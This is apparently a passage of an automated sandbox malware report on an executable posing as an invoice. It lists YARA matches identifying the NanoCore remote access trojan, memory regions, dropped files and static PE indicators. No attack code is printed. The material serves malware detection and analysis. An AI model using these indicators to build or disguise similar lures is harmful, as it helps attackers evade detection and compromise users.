        Source: Yara matchFile source: 13.2.CasPol.exe.3b3b14e.3.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 12.2.svchost.exe.45bd7e0.8.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 12.2.svchost.exe.458a9c0.7.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 0.2.CN-Invoice-XXXXX9808-19011143287994.exe.44b40f0.7.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 19.2.svchost.exe.6a65720.10.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 12.2.svchost.exe.45bd7e0.8.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 19.2.svchost.exe.6a98540.11.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 0.2.CN-Invoice-XXXXX9808-19011143287994.exe.44812d0.6.raw.unpack, type: UNPACKEDPE

        System Summary:

        barindex
        Malicious sample detected (through community Yara rule)Show sources
        Source: 0000000D.00000002.913372093.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 0000000D.00000002.913372093.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 00000000.00000002.933305854.0000000004481000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 00000000.00000002.933305854.0000000004481000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 0000000D.00000002.951074840.00000000051C0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 0000000D.00000002.945545205.0000000003B39000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 0000000D.00000002.949065366.0000000004EE0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 00000013.00000002.972750680.0000000006A65000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 00000013.00000002.972750680.0000000006A65000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 0000000C.00000002.955915936.000000000458A000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 0000000C.00000002.955915936.000000000458A000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: Process Memory Space: CN-Invoice-XXXXX9808-19011143287994.exe PID: 2016, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: Process Memory Space: CN-Invoice-XXXXX9808-19011143287994.exe PID: 2016, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: Process Memory Space: CasPol.exe PID: 4228, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: Process Memory Space: CasPol.exe PID: 4228, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: Process Memory Space: svchost.exe PID: 4184, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: Process Memory Space: svchost.exe PID: 4184, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 13.2.CasPol.exe.3b3ff84.2.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 0.2.CN-Invoice-XXXXX9808-19011143287994.exe.44812d0.6.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 0.2.CN-Invoice-XXXXX9808-19011143287994.exe.44812d0.6.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 13.2.CasPol.exe.3b3ff84.2.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 13.2.CasPol.exe.51c0000.7.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 13.2.CasPol.exe.4ee0000.6.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 13.2.CasPol.exe.51c4629.8.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 13.2.CasPol.exe.51c0000.7.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 13.2.CasPol.exe.3b445ad.4.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 13.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 13.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 19.2.svchost.exe.6a98540.11.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 19.2.svchost.exe.6a98540.11.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 0.2.CN-Invoice-XXXXX9808-19011143287994.exe.44b40f0.7.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 0.2.CN-Invoice-XXXXX9808-19011143287994.exe.44b40f0.7.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 19.2.svchost.exe.6a65720.10.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 19.2.svchost.exe.6a65720.10.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 12.2.svchost.exe.458a9c0.7.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 12.2.svchost.exe.458a9c0.7.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 13.2.CasPol.exe.3b3b14e.3.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 13.2.CasPol.exe.3b3b14e.3.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 12.2.svchost.exe.45bd7e0.8.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 12.2.svchost.exe.45bd7e0.8.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 12.2.svchost.exe.458a9c0.7.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 12.2.svchost.exe.458a9c0.7.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 0.2.CN-Invoice-XXXXX9808-19011143287994.exe.44b40f0.7.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 0.2.CN-Invoice-XXXXX9808-19011143287994.exe.44b40f0.7.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 19.2.svchost.exe.6a65720.10.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 19.2.svchost.exe.6a65720.10.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 12.2.svchost.exe.45bd7e0.8.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 12.2.svchost.exe.45bd7e0.8.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 19.2.svchost.exe.6a98540.11.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 19.2.svchost.exe.6a98540.11.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 0.2.CN-Invoice-XXXXX9808-19011143287994.exe.44812d0.6.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 0.2.CN-Invoice-XXXXX9808-19011143287994.exe.44812d0.6.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Executable has a suspicious name (potential lure to open the executable)Show sources
        Source: CN-Invoice-XXXXX9808-19011143287994.exeStatic file information: Suspicious name
        Initial sample is a PE file and has a suspicious nameShow sources
        Source: initial sampleStatic PE information: Filename: CN-Invoice-XXXXX9808-19011143287994.exe
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287994.exeCode function: 0_2_08A269B0 NtSetInformationThread,0_2_08A269B0
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287994.exeCode function: 0_2_08A27152 NtSetInformationThread,0_2_08A27152
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287994.exeFile created: C:\Windows\Microsoft.NET\Framework\xrpSendfsxMJump to behavior
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287994.exeCode function: 0_2_02D1C4500_2_02D1C450
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287994.exeCode function: 0_2_02D19BA80_2_02D19BA8
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287994.exeCode function: 0_2_08A200400_2_08A20040
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287994.exeCode function: 0_2_08A29A700_2_08A29A70
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287994.exeCode function: 0_2_08A293380_2_08A29338
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287994.exeCode function: 0_2_08A28D400_2_08A28D40
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287994.exeCode function: 0_2_08A200110_2_08A20011
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287994.exeCode function: 0_2_08C400400_2_08C40040
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_033C3BB05_2_033C3BB0
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_033C62585_2_033C6258
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_033C81985_2_033C8198
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_033C9F585_2_033C9F58
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_033C34D45_2_033C34D4
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_033C00405_2_033C0040
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_034620385_2_03462038
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_034630585_2_03463058
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_034620E85_2_034620E8
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_0346E5485_2_0346E548
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_03461B205_2_03461B20
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_04E0C2385_2_04E0C238
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_033C001E5_2_033C001E
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_033C4C785_2_033C4C78
        Source: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exeCode function: 12_2_015EC6A812_2_015EC6A8
        Source: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exeCode function: 12_2_015EC6A312_2_015EC6A3
        Source: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exeCode function: 12_2_015E9BA812_2_015E9BA8
        Source: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exeCode function: 12_2_015E1D1812_2_015E1D18
        Source: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exeCode function: 12_2_06C2004012_2_06C20040
        Source: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exeCode function: 12_2_06C2002112_2_06C20021
        Source: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exeCode function: 12_2_06C2811012_2_06C28110
        Source: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exeCode function: 12_2_0932004012_2_09320040
        Source: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exeCode function: 12_2_093255FE12_2_093255FE
        Source: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exeCode function: 12_2_0932562E12_2_0932562E
        Source: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exeCode function: 19_2_00AC004019_2_00AC0040
        Source: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exeCode function: 19_2_00AC000619_2_00AC0006
        Source: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exeCode function: 19_2_00AC811019_2_00AC8110
        Source: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exeCode function: 19_2_00AC7B2819_2_00AC7B28
        Source: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exeCode function: 19_2_04E4C45019_2_04E4C450
        Source: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exeCode function: 19_2_04E49BA819_2_04E49BA8
        Source: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exeCode function: 19_2_077C004019_2_077C0040
        Source: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exeCode function: 19_2_077C000719_2_077C0007
        Source: C:\Users\user\AppData\Local\Temp\ad6ba6ad-9e3d-4fc8-98d0-88a6e198c3b3\AdvancedRun.exeCode function: String function: 0040B550 appears 50 times
        Source: unknownProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 2016 -ip 2016
        Source: CN-Invoice-XXXXX9808-19011143287994.exeStatic PE information: invalid certificate
        Source: AdvancedRun.exe.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
        Source: AdvancedRun.exe.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
        Source: AdvancedRun.exe.12.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
        Source: AdvancedRun.exe.12.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
        Source: AdvancedRun.exe.19.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
        Source: AdvancedRun.exe.19.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
        Source: CN-Invoice-XXXXX9808-19011143287994.exeBinary or memory string: OriginalFilename vs CN-Invoice-XXXXX9808-19011143287994.exe
        Source: CN-Invoice-XXXXX9808-19011143287994.exe, 00000000.00000002.848479319.0000000000BF2000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameNbTfoyms.exe2 vs CN-Invoice-XXXXX9808-19011143287994.exe
        Source: CN-Invoice-XXXXX9808-19011143287994.exe, 00000000.00000002.964968440.00000000065B0000.00000002.00000001.sdmpBinary or memory string: System.OriginalFileName vs CN-Invoice-XXXXX9808-19011143287994.exe
        Source: CN-Invoice-XXXXX9808-19011143287994.exe, 00000000.00000002.965514873.0000000006600000.00000002.00000001.sdmpBinary or memory string: originalfilename vs CN-Invoice-XXXXX9808-19011143287994.exe
        Source: CN-Invoice-XXXXX9808-19011143287994.exe, 00000000.00000002.965514873.0000000006600000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamepropsys.dll.mui@ vs CN-Invoice-XXXXX9808-19011143287994.exe
        Source: CN-Invoice-XXXXX9808-19011143287994.exe, 00000000.00000002.925195088.00000000042BD000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameRunPeBraba.dll6 vs CN-Invoice-XXXXX9808-19011143287994.exe
        Source: CN-Invoice-XXXXX9808-19011143287994.exe, 00000000.00000002.925195088.00000000042BD000.00000004.00000001.sdmpBinary or memory string: ,@shell32.dllSHGetSpecialFolderPathWshlwapi.dllSHAutoComplete%2.2X%2.2X%2.2X&lt;&gt;&quot;&deg;&amp;<br><font size="%d" color="#%s"><b></b>\StringFileInfo\\VarFileInfo\Translation%4.4X%4.4X040904E4ProductNameFileDescriptionFileVersionProductVersionCompanyNameInternalNameLegalCopyrightOriginalFileNameRSDSu vs CN-Invoice-XXXXX9808-19011143287994.exe
        Source: CN-Invoice-XXXXX9808-19011143287994.exe, 00000000.00000002.925195088.00000000042BD000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameAdvancedRun.exe8 vs CN-Invoice-XXXXX9808-19011143287994.exe
        Source: CN-Invoice-XXXXX9808-19011143287994.exe, 00000000.00000002.933305854.0000000004481000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameCngH Tzy.exe2 vs CN-Invoice-XXXXX9808-19011143287994.exe
        Source: CN-Invoice-XXXXX9808-19011143287994.exe, 00000000.00000002.949930173.0000000004EF0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamemscorrc.dllT vs CN-Invoice-XXXXX9808-19011143287994.exe
        Source: 0000000D.00000002.913372093.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 0000000D.00000002.913372093.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 00000000.00000002.933305854.0000000004481000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000000.00000002.933305854.0000000004481000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 0000000D.00000002.951074840.00000000051C0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 0000000D.00000002.951074840.00000000051C0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 0000000D.00000002.945545205.0000000003B39000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 0000000D.00000002.949065366.0000000004EE0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 0000000D.00000002.949065366.0000000004EE0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 00000013.00000002.972750680.0000000006A65000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000013.00000002.972750680.0000000006A65000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 0000000C.00000002.955915936.000000000458A000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 0000000C.00000002.955915936.000000000458A000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: Process Memory Space: CN-Invoice-XXXXX9808-19011143287994.exe PID: 2016, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: Process Memory Space: CN-Invoice-XXXXX9808-19011143287994.exe PID: 2016, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: Process Memory Space: CasPol.exe PID: 4228, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: Process Memory Space: CasPol.exe PID: 4228, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: Process Memory Space: svchost.exe PID: 4184, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: Process Memory Space: svchost.exe PID: 4184, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 13.2.CasPol.exe.3b3ff84.2.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 13.2.CasPol.exe.3b3ff84.2.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 0.2.CN-Invoice-XXXXX9808-19011143287994.exe.44812d0.6.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 0.2.CN-Invoice-XXXXX9808-19011143287994.exe.44812d0.6.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 0.2.CN-Invoice-XXXXX9808-19011143287994.exe.44812d0.6.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 13.2.CasPol.exe.3b3ff84.2.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 13.2.CasPol.exe.3b3ff84.2.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 13.2.CasPol.exe.51c0000.7.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 13.2.CasPol.exe.51c0000.7.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 13.2.CasPol.exe.4ee0000.6.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 13.2.CasPol.exe.4ee0000.6.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 13.2.CasPol.exe.51c4629.8.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 13.2.CasPol.exe.51c4629.8.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
